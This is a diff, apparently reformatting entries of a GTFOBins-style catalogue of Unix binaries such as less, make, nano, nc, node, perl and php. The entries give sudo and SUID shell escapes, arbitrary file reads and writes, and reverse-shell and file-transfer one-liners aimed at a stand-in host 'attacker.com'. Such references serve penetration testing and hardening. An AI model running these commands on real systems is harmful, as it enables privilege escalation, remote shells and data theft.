export LFILE=file_to_read
|
||||
ksh -c 'echo "$(<$LFILE)"'
|
||||
- description: It trims trailing newlines.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
|
||||
- description: It trims trailing newlines.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
ksh -c 'echo "$(<$LFILE)"'
|
||||
- description: It trims trailing newlines.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
|
||||
suid-enabled:
|
||||
- code: "./ksh -p"
|
||||
- code: ./ksh -p
|
||||
sudo-enabled:
|
||||
- code: sudo ksh
|
||||
- code: sudo ksh
|
||||
---
|
||||
|
@ -9,9 +9,9 @@ description: |
|
||||
```
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: "/lib/ld.so /bin/sh"
|
||||
- code: /lib/ld.so /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./ld.so /bin/sh -p"
|
||||
- code: ./ld.so /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo /lib/ld.so /bin/sh
|
||||
- code: sudo /lib/ld.so /bin/sh
|
||||
---
|
||||
|
@ -1,22 +1,20 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
less /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
||||
v
|
||||
- code: |
|
||||
less /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
||||
v
|
||||
file-read:
|
||||
- code: 'less file_to_read
|
||||
|
||||
'
|
||||
- code: less file_to_read
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo less /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
sudo less /etc/profile
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |
|
||||
./less /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
./less /etc/profile
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -1,7 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: ltrace -b -L /bin/sh
|
||||
- code: ltrace -b -L /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo ltrace -b -L /bin/sh
|
||||
- code: sudo ltrace -b -L /bin/sh
|
||||
---
|
||||
|
@ -1,17 +1,17 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- description: This creates a valid Mbox file which may be required by the binary.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo "From nobody@localhost $(date)" > $TF
|
||||
mail -f $TF
|
||||
!/bin/sh
|
||||
- description: This creates a valid Mbox file which may be required by the binary.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo "From nobody@localhost $(date)" > $TF
|
||||
mail -f $TF
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- description: This creates a valid Mbox file which may be required by the binary.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo "From nobody@localhost $(date)" > $TF
|
||||
sudo mail -f $TF
|
||||
!/bin/sh
|
||||
- description: This creates a valid Mbox file which may be required by the binary.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo "From nobody@localhost $(date)" > $TF
|
||||
sudo mail -f $TF
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -1,24 +1,21 @@
|
||||
---
|
||||
description: |
|
||||
All these examples only work with GNU `make` due to the lack of support of the
|
||||
`--eval` flag. The same can be achieved by using a proper `Makefile` or by
|
||||
passing the content via stdin using `-f -`.
|
||||
description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
COMMAND='/bin/sh'
|
||||
make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
- code: |
|
||||
COMMAND='/bin/sh'
|
||||
make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
file-write:
|
||||
- description: Requires a newer GNU `make` version.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
make -s --eval="\$(file >$LFILE,data)" .
|
||||
- description: Requires a newer GNU `make` version.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
make -s --eval="\$(file >$LFILE,data)" .
|
||||
suid-enabled:
|
||||
- code: |
|
||||
COMMAND='/bin/sh -p'
|
||||
./make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
- code: |
|
||||
COMMAND='/bin/sh -p'
|
||||
./make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
COMMAND='/bin/sh'
|
||||
sudo make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
- code: |
|
||||
COMMAND='/bin/sh'
|
||||
sudo make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
---
|
||||
|
@ -1,19 +1,17 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
man man
|
||||
!/bin/sh
|
||||
- code: |
|
||||
man man
|
||||
!/bin/sh
|
||||
file-read:
|
||||
- code: 'man file_to_read
|
||||
|
||||
'
|
||||
- code: man file_to_read
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo man man
|
||||
!/bin/sh
|
||||
- code: |
|
||||
sudo man man
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |
|
||||
./man man
|
||||
!/bin/sh
|
||||
- code: |
|
||||
./man man
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -1,17 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
TERM= more /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
TERM= more /etc/profile
|
||||
!/bin/sh
|
||||
file-read:
|
||||
- code: 'more file_to_read
|
||||
|
||||
'
|
||||
- code: more file_to_read
|
||||
suid-enabled:
|
||||
- code: "./more file_to_read\n"
|
||||
- code: "./more file_to_read\n"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
TERM= sudo -E more /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
TERM= sudo -E more /etc/profile
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
|
||||
code: |
|
||||
sudo mount -o bind /bin/sh /bin/mount
|
||||
sudo mount
|
||||
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
|
||||
code: |
|
||||
sudo mount -o bind /bin/sh /bin/mount
|
||||
sudo mount
|
||||
---
|
||||
|
@ -1,38 +1,36 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
nano -s $TF /etc/hosts
|
||||
^T
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
nano -s $TF /etc/hosts
|
||||
^T
|
||||
file-write:
|
||||
- code: |
|
||||
nano file_to_write
|
||||
^O
|
||||
- code: |
|
||||
nano file_to_write
|
||||
^O
|
||||
file-read:
|
||||
- code: 'nano file_to_read
|
||||
|
||||
'
|
||||
- code: nano file_to_read
|
||||
suid-enabled:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
./nano -s $TF /etc/hosts
|
||||
^T
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
./nano -s $TF /etc/hosts
|
||||
^T
|
||||
sudo-enabled:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
sudo nano -s $TF /etc/hosts
|
||||
^T
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
sudo nano -s $TF /etc/hosts
|
||||
^T
|
||||
---
|
||||
|
@ -1,29 +1,27 @@
|
||||
---
|
||||
functions:
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
nc -e /bin/sh $RHOST $RPORT
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
nc -e /bin/sh $RHOST $RPORT
|
||||
bind-shell-interactive:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
nc -l -p $LPORT -e /bin/sh
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
nc -l -p $LPORT -e /bin/sh
|
||||
upload:
|
||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
|
||||
on the attacker box to collect the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
nc $RHOST $RPORT < "$LFILE"
|
||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
nc $RHOST $RPORT < "$LFILE"
|
||||
download:
|
||||
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345
|
||||
< "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
LPORT=12345
|
||||
LFILE=file_to_save
|
||||
nc -l -p $LPORT > "$LFILE"
|
||||
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
LPORT=12345
|
||||
LFILE=file_to_save
|
||||
nc -l -p $LPORT > "$LFILE"
|
||||
---
|
||||
|
@ -1,19 +1,16 @@
|
||||
---
|
||||
description: 'The read file content is corrupted by a leading space added to each
|
||||
line.
|
||||
|
||||
'
|
||||
description: The read file content is corrupted by a leading space added to each line.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
nl -bn -w1 -s '' $LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
nl -bn -w1 -s '' $LFILE
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./nl -bn -w1 -s '' $LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./nl -bn -w1 -s '' $LFILE
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo nl -bn -w1 -s '' $LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo nl -bn -w1 -s '' $LFILE
|
||||
---
|
||||
|
@ -1,38 +1,33 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});''
|
||||
|
||||
'
|
||||
- code: |
|
||||
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
node -e 'sh = require("child_process").spawn("/bin/sh");
|
||||
net.connect(process.env.RPORT, process.env.RHOST, function () {
|
||||
this.pipe(sh.stdin);
|
||||
sh.stdout.pipe(this);
|
||||
sh.stderr.pipe(this);
|
||||
});'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
node -e 'sh = require("child_process").spawn("/bin/sh");
|
||||
net.connect(process.env.RPORT, process.env.RHOST, function () {
|
||||
this.pipe(sh.stdin);
|
||||
sh.stdout.pipe(this);
|
||||
sh.stderr.pipe(this);
|
||||
});'
|
||||
bind-shell-interactive:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
node -e 'sh = require("child_process").spawn("/bin/sh");
|
||||
require("net").createServer(function (client) {
|
||||
client.pipe(sh.stdin);
|
||||
sh.stdout.pipe(client);
|
||||
sh.stderr.pipe(client);
|
||||
}).listen(process.env.LPORT);'
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
node -e 'sh = require("child_process").spawn("/bin/sh");
|
||||
require("net").createServer(function (client) {
|
||||
client.pipe(sh.stdin);
|
||||
sh.stdout.pipe(client);
|
||||
sh.stderr.pipe(client);
|
||||
}).listen(process.env.LPORT);'
|
||||
suid-enabled:
|
||||
- code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0,
|
||||
1, 2]});''
|
||||
|
||||
'
|
||||
- code: |
|
||||
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
||||
sudo-enabled:
|
||||
- code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1,
|
||||
2]});''
|
||||
|
||||
'
|
||||
- code: |
|
||||
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
---
|
||||
|
@ -1,18 +1,16 @@
|
||||
---
|
||||
description: |
|
||||
Three spaces are added before each character in the read file, and
|
||||
non-printable chars are printed as backslash escape sequences.
|
||||
description: Three spaces are added before each character in the read file, and non-printable chars are printed as backslash escape sequences.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
od -An -c -w9999 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
od -An -c -w9999 "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./od -An -c -w9999 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./od -An -c -w9999 "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo od -An -c -w9999 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo od -An -c -w9999 "$LFILE"
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: perl -e 'exec "/bin/sh";'
|
||||
- code: perl -e 'exec "/bin/sh";'
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
suid-enabled:
|
||||
- code: ./perl -e 'exec "/bin/sh";'
|
||||
- code: ./perl -e 'exec "/bin/sh";'
|
||||
sudo-enabled:
|
||||
- code: sudo perl -e 'exec "/bin/sh";'
|
||||
- code: sudo perl -e 'exec "/bin/sh";'
|
||||
---
|
||||
|
@ -1,50 +1,49 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r 'system(getenv("CMD"));'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r 'passthru(getenv("CMD"));'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r 'print(shell_exec(getenv("CMD")));'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r 'system(getenv("CMD"));'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r 'passthru(getenv("CMD"));'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r 'print(shell_exec(getenv("CMD")));'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
|
||||
execute-non-interactive:
|
||||
- code: |
|
||||
export CMD="id"
|
||||
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
||||
- code: |
|
||||
export CMD="id"
|
||||
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server. This requires
|
||||
PHP version 5.4 or later.
|
||||
code: |
|
||||
LHOST=0.0.0.0
|
||||
LPORT=8888
|
||||
php -S $LHOST:$LPORT
|
||||
- description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
|
||||
code: |
|
||||
LHOST=0.0.0.0
|
||||
LPORT=8888
|
||||
php -S $LHOST:$LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=file_to_save
|
||||
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=file_to_save
|
||||
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
||||
suid-enabled:
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
./php -r "system('$CMD');"
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
./php -r "system('$CMD');"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
sudo php -r "system('$CMD');"
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
sudo php -r "system('$CMD');"
|
||||
---
|
||||
|
@ -1,38 +1,36 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
pico -s $TF /etc/hosts
|
||||
^T
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
pico -s $TF /etc/hosts
|
||||
^T
|
||||
file-write:
|
||||
- code: |
|
||||
pico file_to_write
|
||||
^O
|
||||
- code: |
|
||||
pico file_to_write
|
||||
^O
|
||||
file-read:
|
||||
- code: 'pico file_to_read
|
||||